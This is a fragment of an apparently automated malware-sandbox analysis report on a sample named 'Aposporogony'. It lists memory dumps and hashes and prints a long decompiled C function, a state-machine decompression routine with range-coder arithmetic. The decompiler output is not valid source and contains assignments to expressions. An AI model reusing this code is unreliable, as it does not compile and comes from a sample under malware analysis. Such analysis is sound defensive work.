                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                                                                                      • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                                                                                                      • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                                                      			E00406DFB() {
                                                                                                                                                                                      				unsigned short _t531;
                                                                                                                                                                                      				signed int _t532;
                                                                                                                                                                                      				void _t533;
                                                                                                                                                                                      				signed int _t534;
                                                                                                                                                                                      				signed int _t535;
                                                                                                                                                                                      				signed int _t565;
                                                                                                                                                                                      				signed int _t568;
                                                                                                                                                                                      				signed int _t589;
                                                                                                                                                                                      				signed int* _t606;
                                                                                                                                                                                      				void* _t613;
                                                                                                                                                                                      
                                                                                                                                                                                      				L0:
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L0:
                                                                                                                                                                                      					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                                                      						 *(_t613 - 0x84) = 0xa;
                                                                                                                                                                                      						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						 *(__ebp - 0x84) = 9;
                                                                                                                                                                                      						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                      						 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                      							L133:
                                                                                                                                                                                      							_t531 =  *_t606;
                                                                                                                                                                                      							_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                                      							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                      							if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                      								 *(_t613 - 0x40) = 1;
                                                                                                                                                                                      								_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                      								 *_t606 = _t532;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                      								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                      								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                      								goto L139;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L137:
                                                                                                                                                                                      							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                      								 *(_t613 - 0x88) = 5;
                                                                                                                                                                                      								L170:
                                                                                                                                                                                      								_t568 = 0x22;
                                                                                                                                                                                      								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                                                      								_t535 = 0;
                                                                                                                                                                                      								L172:
                                                                                                                                                                                      								return _t535;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                                                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							L139:
                                                                                                                                                                                      							_t533 =  *(_t613 - 0x84);
                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                      								 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									L1:
                                                                                                                                                                                      									_t534 =  *(_t613 - 0x88);
                                                                                                                                                                                      									if(_t534 > 0x1c) {
                                                                                                                                                                                      										break;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									switch( *((intOrPtr*)(_t534 * 4 +  &M00407395))) {
                                                                                                                                                                                      										case 0:
                                                                                                                                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                      											_t534 =  *( *(_t613 - 0x70));
                                                                                                                                                                                      											if(_t534 > 0xe1) {
                                                                                                                                                                                      												goto L171;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t538 = _t534 & 0x000000ff;
                                                                                                                                                                                      											_push(0x2d);
                                                                                                                                                                                      											asm("cdq");
                                                                                                                                                                                      											_pop(_t570);
                                                                                                                                                                                      											_push(9);
                                                                                                                                                                                      											_pop(_t571);
                                                                                                                                                                                      											_t609 = _t538 / _t570;
                                                                                                                                                                                      											_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                                                      											asm("cdq");
                                                                                                                                                                                      											_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                                                      											 *(_t613 - 0x3c) = _t604;
                                                                                                                                                                                      											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                                                      											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                                                      											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                                                      											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                                                      												L10:
                                                                                                                                                                                      												if(_t612 == 0) {
                                                                                                                                                                                      													L12:
                                                                                                                                                                                      													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                                                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                      													goto L15;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													goto L11;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												do {
                                                                                                                                                                                      													L11:
                                                                                                                                                                                      													_t612 = _t612 - 1;
                                                                                                                                                                                      													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                                                      												} while (_t612 != 0);
                                                                                                                                                                                      												goto L12;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											if( *(_t613 - 4) != 0) {
                                                                                                                                                                                      												GlobalFree( *(_t613 - 4));
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                      											 *(_t613 - 4) = _t534;
                                                                                                                                                                                      											if(_t534 == 0) {
                                                                                                                                                                                      												goto L171;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                                                      												goto L10;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 1:
                                                                                                                                                                                      											L13:
                                                                                                                                                                                      											__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                      												 *(_t613 - 0x88) = 1;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                      											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                                                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                      											_t45 = _t613 - 0x48;
                                                                                                                                                                                      											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                                                      											__eflags =  *_t45;
                                                                                                                                                                                      											L15:
                                                                                                                                                                                      											if( *(_t613 - 0x48) < 4) {
                                                                                                                                                                                      												goto L13;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t546 =  *(_t613 - 0x40);
                                                                                                                                                                                      											if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                                                                                      												L20:
                                                                                                                                                                                      												 *(_t613 - 0x48) = 5;
                                                                                                                                                                                      												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                      												goto L23;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *(_t613 - 0x74) = _t546;
                                                                                                                                                                                      											if( *(_t613 - 8) != 0) {
                                                                                                                                                                                      												GlobalFree( *(_t613 - 8));
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                                                                                      											 *(_t613 - 8) = _t534;
                                                                                                                                                                                      											if(_t534 == 0) {
                                                                                                                                                                                      												goto L171;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L20;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 2:
                                                                                                                                                                                      											L24:
                                                                                                                                                                                      											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                                                                                      											 *(_t613 - 0x84) = 6;
                                                                                                                                                                                      											 *(_t613 - 0x4c) = _t553;
                                                                                                                                                                                      											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                                      											 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                      											goto L133;
                                                                                                                                                                                      										case 3:
                                                                                                                                                                                      											L21:
                                                                                                                                                                                      											__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                      											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                      												 *(_t613 - 0x88) = 3;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                      											_t67 = _t613 - 0x70;
                                                                                                                                                                                      											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                      											__eflags =  *_t67;
                                                                                                                                                                                      											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											L23:
                                                                                                                                                                                      											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                                                                                      											if( *(_t613 - 0x48) != 0) {
                                                                                                                                                                                      												goto L21;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											goto L24;
                                                                                                                                                                                      										case 4:
                                                                                                                                                                                      											L133:
                                                                                                                                                                                      											_t531 =  *_t606;
                                                                                                                                                                                      											_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                                      											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                      											if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                      												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                      												 *(_t613 - 0x40) = 1;
                                                                                                                                                                                      												_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                      												 *_t606 = _t532;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                      												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                      												goto L139;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 5:
                                                                                                                                                                                      											goto L137;
                                                                                                                                                                                      										case 6:
                                                                                                                                                                                      											__edx = 0;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      												 *(__ebp - 0x34) = 1;
                                                                                                                                                                                      												 *(__ebp - 0x84) = 7;
                                                                                                                                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                      													goto L133;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                      											__esi =  *(__ebp - 0x60);
                                                                                                                                                                                      											__cl = 8;
                                                                                                                                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                      											__ecx =  *(__ebp - 4);
                                                                                                                                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                      													_t98 = __ebp - 0x38;
                                                                                                                                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                      													__eflags =  *_t98;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *(__ebp - 0x38) = 0;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                      												__ebx = 0;
                                                                                                                                                                                      												__ebx = 1;
                                                                                                                                                                                      												goto L61;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__ecx =  *(__ebp - 8);
                                                                                                                                                                                      												__ebx = 0;
                                                                                                                                                                                      												__ebx = 1;
                                                                                                                                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                      												goto L41;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 7:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                                                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                      												__eax = 0;
                                                                                                                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      												__al = __al & 0x000000fd;
                                                                                                                                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      												goto L69;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eax =  *(__ebp - 4);
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      											 *(__ebp - 0x84) = 8;
                                                                                                                                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                      												 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                      												goto L133;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 8:
                                                                                                                                                                                      											goto L0;
                                                                                                                                                                                      										case 9:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												goto L89;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                      												goto L171;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eax = 0;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                      											__eflags = _t258;
                                                                                                                                                                                      											0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                                      											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                                      											goto L75;
                                                                                                                                                                                      										case 0xa:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												__eax =  *(__ebp - 4);
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                      													goto L133;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eax =  *(__ebp - 0x28);
                                                                                                                                                                                      											goto L88;
                                                                                                                                                                                      										case 0xb:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      												__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                      												__eax =  *(__ebp - 0x20);
                                                                                                                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                      											L88:
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                      											L89:
                                                                                                                                                                                      											__eax =  *(__ebp - 4);
                                                                                                                                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                      											goto L69;
                                                                                                                                                                                      										case 0xc:
                                                                                                                                                                                      											L99:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t334 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t334;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      											goto L101;
                                                                                                                                                                                      										case 0xd:
                                                                                                                                                                                      											L37:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                      												goto L170;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											_t122 = __ebp - 0x70;
                                                                                                                                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      											__eflags =  *_t122;
                                                                                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      											L39:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                      												goto L48;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags = __ebx - 0x100;
                                                                                                                                                                                      											if(__ebx >= 0x100) {
                                                                                                                                                                                      												goto L54;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L41:
                                                                                                                                                                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                      											 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                      											__eax = __eax + 1;
                                                                                                                                                                                      											__eax = __eax << 8;
                                                                                                                                                                                      											__eax = __eax + __ebx;
                                                                                                                                                                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      											__ax =  *__esi;
                                                                                                                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      											__edx = __ax & 0x0000ffff;
                                                                                                                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      												__cx = __ax;
                                                                                                                                                                                      												 *(__ebp - 0x40) = 1;
                                                                                                                                                                                      												__cx = __ax >> 5;
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                      												 *__esi = __ax;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      												0x800 = 0x800 - __edx;
                                                                                                                                                                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                      												__ebx = __ebx + __ebx;
                                                                                                                                                                                      												 *__esi = __cx;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      												goto L39;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												goto L37;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										case 0xe:
                                                                                                                                                                                      											L46:
                                                                                                                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      												 *(__ebp - 0x88) = 0xe;
